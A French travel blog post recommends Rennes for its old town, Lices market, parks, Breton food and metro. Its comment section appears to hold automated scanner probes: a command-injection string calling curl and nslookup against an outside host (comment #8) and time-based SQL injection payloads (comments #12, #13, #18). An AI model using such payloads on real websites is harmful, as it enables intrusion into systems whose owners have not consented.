· 

Rennes, une ville à vivre

☀ Salut les Hanamiens,

Que de souvenirs dans cette ville qui m'a hébergée pendant presque 2 ans. Je parle d'une ville à vivre parce qu'il n'y a pas vraiment de monuments à visiter comme dans une ville comme Paris où l'on enchaîne les visites, c'est plutôt la vie au quotidien et un réel état de bien être que j'ai ressenti en étant là-bas. Accordez-vous une pause détente en vous baladant dans les rues pleines de charmes, admirez les maisons en pans-de-bois, ressentez toutes les saveurs de la Bretagne à travers le grand marché des Lices ou dans de très bons restaurants testés par votre chère blogueuse. Ce n'est qu'un aperçu des nombreuses choses à voir ou faire à Rennes, en tant que touriste ou au quotidien. Dans cet article je vous fais part de mon expérience rennaise, mes appréciations, conseils et bons plans.

Carnet Hanami ♥ Rennes une ville à vivre

Balade dans la ville

Une des premières choses à faire à Rennes c'est se balader dans les rues piétonnes du centre-ville historique facilement accessible aux piétons et qui couvre plusieurs rues proches les unes des autres. Les allées bien animées sont bordées de magasins de grandes marques, petites boutiques, bars et restaurants. L'architecture des bâtiments et des ruelles déborde de charmes et c'est un plaisir de parcourir la ville à pied. Vous ne manquerez pas d’admirer les maisons en pans-de-bois dignes des paysages alsaciens (les plus belles selon moi se trouvent place du Champ Jacquet et rue du Chapitre).

Carnet Hanami ♥ Rennes une ville à vivre ~ Maisons en pans-de-bois place du Champ Jacquet

Durant cette balade, vous découvrirez différents places et monuments intéressants à voir comme notamment la jolie Place de la Mairie qui, vous vous en doutez, abrite la Mairie ainsi que l'Opéra. L'endroit est vaste et très sympa, d'autant plus en juillet et août quand les pavés sont couverts de transats, parasols et spectacles en tout genre (j'ai adoré ce décor, reposant et très mignon, plus d'infos ici). L'hiver n'est pas mal non plus, quand des jeux de lumières illuminent les bâtiments, on se croirait à la fête des Lumières de Lyon (renseignez-vous sur les dates exactes).

Remontez ensuite les larges rues commerciales pour atteindre la place Sainte-Anne (au milieu des travaux en cours en 2019) se dresse l'imposante Basilique Notre-Dame-de-Bonne-Nouvelle, un nom bien original. De nombreuses terrasses de bars et restaurants remplissent la place toujours très animée et cette animation se prolonge toujours en soirée dans la rue Saint-Michel ou plus célèbrement la "Rue de la Soif". L'endroit n'a cependant pas beaucoup de charme et fait plutôt fuir en raison des bâtiments vieillots et de l'aspect "sale".

Vous ne manquerez pas de passer à côté du Parlement de Bretagne et du Palais du Commerce  situés en plein cœur de la ville (la place du parlement accueille également des spectacles de lumière l'hiver).  À l'ouest du centre, découvrez la Cathédrale Saint-Pierre dont l'intérieur est joliment décoré, ainsi que les Portes Mordelaises, vestiges historiques des remparts de Rennes.

Rennes est parcouru par le Canal d'Ille-et-Rance qui rejoint Saint-Malo. Je me suis promenée quelques fois le long de ce fils d'eau sans grand enthousiasme car je trouve que les bords du canal ne sont pas mis en valeur. Cependant il peut intéresser les amateurs de vélos avec sa piste cyclable qui se prolonge dans les terres (je n'ai pas testé mais j'ai entendu de bons échos sur ce parcours).

Les Champs libres

Plus au sud on oublie les bâtiments historiques et on continue à explorer la ville entourés de boutiques en passant par la rue Vasselot jusqu'à atteindre l'Esplanade Charles de Gaulle qui représente un centre d’intérêt culturel.  Vous y trouverez un cinéma (bon plan : vous pouvez choisir votre place dans la salle de cinéma donc pensez à réserver à l'avance sur internet), une salle de spectacle mais surtout Les Champs libres qui regroupe un musée, une bibliothèque (qui offre une vue surplombante de la ville), l'Espace des sciences et son planétarium que je vous recommande fortement. L'endroit est vraiment agréable et satisfera les grands comme les petits. J'ai eu un coup de cœur pour le planétarium avec ses beaux volumes qui nous transporte dans les étoiles, j'ai passé un très beau moment (pensez à réserver en ligne). Vous trouverez toutes les informations de programmation ici.

Marché des Lices

Carnet Hanami ♥ Rennes une ville à vivre ~ Marché des Lices

Le samedi de 7h30 à 13h30, je vous invite à parcourir le Marché des Lices qui se tient sur la place éponyme et annoncé comme le deuxième plus grand marché de France, rien que ça !  C'est vrai qu'il est très grand ce marché, envahissant toutes la place en pleine air mais également l'intérieur de deux halles avec presque 300 exposants. L'endroit regorge également d'histoire puisque le marché existe depuis le 17e siècle. Vous y retrouverez toutes sortes de plantes, fleurs, fruits et légumes mais également fromages, beurres, miels, confitures, pains, épices, vins, cidres, viandes, charcuterie, poissons et fruits de mer. C'est toujours un plaisir de flâner entre les étales, regarder un expert extraire une saint jacques de sa coquille, ressentir toutes les odeurs diverses et variées et remplir son petit chariot de bonnes choses. Si vous n'avez pas l'habitude, c'est l'occasion d'acheter des fruits de mer bien frais et à un bon prix. Le marché des Lices c'est également des dizaines de restaurateurs proposant leur spécialité à emporter ou à déguster sur place. Ne manquez pas la célèbre galette saucisse sans avoir cependant mérité votre repas après avoir fait la queue comme tout le monde. Le marché s'anime aussi sur la musique ou la danse d'artistes de rue. Ne passez pas à Rennes sans vivre ce marché !

Petite pause arborée

Carnet Hanami ♥ Rennes une ville à vivre ~ Parc arboré

Un des aspects que j'aime beaucoup à Rennes c'est la proportion d'espaces verts qui participent à cette bonne joie de vivre. Le Parc du Thabor est le plus grand de la ville, idéal pour s'installer sur sa petite serviette, un bouquin à la main et une brise légère sur son visage. J’exagère un peu mais j'adore ce parc et l'atmosphère y est tellement agréable (l'entrée principale se situe à côté de l'Église Saint-Melaine).

Il existe également d'autres parcs et squares plut petits à travers la ville.

Qu'est ce qu'on mange ?

N'oublions pas l'essentiel, se nourrir ! J'ai goûté quelques spécialités culinaires rennaises ou plus globalement bretonnes et même si elles ne sont pas toutes à mon goût c'est une expérience à ne pas manquer. Il y a bien évidemment les galettes de sarrasin, et plus spécialement la galette à la saucisse à déguster sur le marché des Lices. Les crêperies ne manquent pas à Rennes et les avis sur internet non plus alors laissez-vous guider.  Ensuite le cidre, un incontournable ! Une bolinette et vous êtes ravigotés pour la journée ! Pour terminer un repas, une bouchée de Kouign Amann et vous ne pourrez plus rien avaler. Il a la saveur d'une autre spécialité de la région, le  caramel au beurre salé que vous connaissez j'en suis certaine. Voici d'autres mets à découvrir : le Kig Ha Farz, l'andouille de Guéméné, la cotriade, le far breton, le chouchen, le lambig et les biscuits bretons. Le pommé rennais et le parlementin viennent spécifiquement de Rennes, dommage que je n'en ai jamais mangé.

Pour la jurassienne que je suis, un séjour en Bretagne rime également avec fruits de mer frais et même si Rennes n'est pas très proche du littoral, la ville regorge de bons restaurants en la matière. Je vous conseille La Taverne de la Marine pour ses plateaux de fruits de mer ou ses menus très abordables dans un décor authentique, la preuve à l'appui juste en-dessous !

Carnet Hanami ♥ Rennes une ville à vivre ~ Plateau de fruits de mer à La Taverne de la Marine

"Et alors tu n'as pas d'autres bonnes adresses à nous conseiller ?"

Je plaide coupable pour ce qui est des restaurants traditionnels, par contre les sorties du weekend c'est mon affaire ! Entendez mon doux fredonnement ... ♪ Pour un brunch avec toi ♫ je ferais n'importe quoi ♪♪ Oui Oui je comprends, moi aussi je ferais n'importe quoi pour un brunch 😁 ! Retrouvez tous mes bons plans dans mon article spécial sur les brunchs rennais.

Carnet Hanami ♥ Rennes une ville à vivre ~ Bruncher à Rennes

Shopping

Je termine cet article en pleine période de soldes donc arrêt shopping obligé ! L'avantage c'est que vous pourrez profiter de votre promenade dans le centre historique pour faire d'une pierre deux coups. De la Place Sainte-Anne à la Place de la République, des dizaines et des dizaines de vitrines n'attendent que vos yeux pour vous pousser à l'achat, un vrai bonheur pour les reines du shopping ! Pour les plus adeptes, je vous propose les centres commerciaux Colombia et Visitation également situés dans le centre de Rennes. Aux portes de la ville, les centres Alma et Grand Quartier sont accessibles en voiture et très riches en magasins.

Où loger et comment se déplacer ?

Le réseau de transport en commun de Rennes, nommé STAR, est bien développé et je vous conseille vivement de l'utiliser. Le métro est très sympa et parcourt toute la ville, du nord-ouest au sud, vous permettant de prendre un logement à l'extérieur du centre-ville tout en y accédant très facilement. C'était d'ailleurs mon mode de vie quand j’habitais là-bas. Une deuxième ligne de métro est actuellement en construction pour compléter le réseau et les bus sont nombreux afin de relier d’autres points de la ville (plus d'informations ici). Le réseau dispose également de parkings relais afin de garer votre voiture à proximité d'un arrêt de métro afin de faciliter son utilisation, vous n'aurez alors qu'à payer le ticket de transport qui vous permettra de sortir du parking sans autres frais (1,50€ pour 1h, 4.20€ pour 1 jour). Je vous conseille donc de choisir votre logement en fonction de vos besoins de déplacement en transport en commun et d'accès au centre-ville. J'habitais vers Grand Quartier au nord-ouest, dans un quartier calme, proche d'un parc, et je rejoignais le centre-ville en prenant un bus puis le métro ou tout simplement le vélo. Évitez cependant les alentours des stations J.F. Kennedy à la mauvaise fréquentation et Sainte-Anne à l'image de la réputation de la rue de la soif. N'hésitez pas à me demander conseil si vous avez des doutes.

Et la météo alors ?

Vous avez certainement cette question sur la bouche, avec toutes les rumeurs circulant sur le climat de la Bretagne... alors est-ce qu'il pleut vraiment plus qu'ailleurs ? Et bien je pense que non, pas à Rennes en tout cas, et pour preuve j'allais au travail en vélo tous les matins et j'ai peu de souvenirs en tête où la pluie m'a empêchée d'enfourner mon fidèle destrier (que je me suis fait voler au passage donc faites attention). Au niveau des températures c'est bien tempéré, il ne fait pas trop chaud l'été et pas trop froid l'hiver. Je crois que ce qui m'a davantage marqué c'est le vent comme je suis frileuse des oreilles et du cou.

N'hésitez plus et partez pour cette destination à vivre sans plus tarder ! Visitez également d'autres lieux immanquables de la région comme le Mont-Saint-Michel, Dinan,  Saint-Malo, Cancale et j'en passe. L'article est en cours de rédaction, à lire prochainement !

A très bientôt mes chers Hanamiens 😘

Écrire commentaire

Commentaires: 19
  • #1

    MmzHrrdb (dimanche, 01 septembre 2024 08:11)

    20

  • #2

    MmzHrrdb (dimanche, 01 septembre 2024 08:13)

    20

  • #3

    MmzHrrdb (dimanche, 01 septembre 2024 08:20)

    20

  • #4

    MmzHrrdb (dimanche, 01 septembre 2024 08:20)

    20

  • #5

    MmzHrrdb (dimanche, 01 septembre 2024 08:20)

    20

  • #6

    MmzHrrdb (dimanche, 01 septembre 2024 08:20)

    20

  • #7

    MmzHrrdb (dimanche, 01 septembre 2024 08:20)

    20

  • #8

    |(nslookup -q=cname hitscixbqylxg00452.bxss.me||curl hitscixbqylxg00452.bxss.me) (dimanche, 01 septembre 2024 08:21)

    20

  • #9

    MmzHrrdb (dimanche, 01 septembre 2024 08:21)

    20

  • #10

    MmzHrrdb (dimanche, 01 septembre 2024 08:22)

    20

  • #11

    MmzHrrdb (dimanche, 01 septembre 2024 08:22)

    20

  • #12

    MmzHrrdb (dimanche, 01 septembre 2024 08:23)

    (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  • #13

    MmzHrrdb (dimanche, 01 septembre 2024 08:23)

    20aycT0dDW') OR 219=(SELECT 219 FROM PG_SLEEP(15))--

  • #14

    MmzHrrdb (dimanche, 01 septembre 2024 08:24)

    20

  • #15

    MmzHrrdb (dimanche, 01 septembre 2024 08:25)

    20

  • #16

    MmzHrrdb (dimanche, 01 septembre 2024 08:25)

    20

  • #17

    MmzHrrdb (dimanche, 01 septembre 2024 08:26)

    20

  • #18

    MmzHrrdb0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z (dimanche, 01 septembre 2024 08:26)

    20

  • #19

    MmzHrrdb (dimanche, 01 septembre 2024 08:27)

    20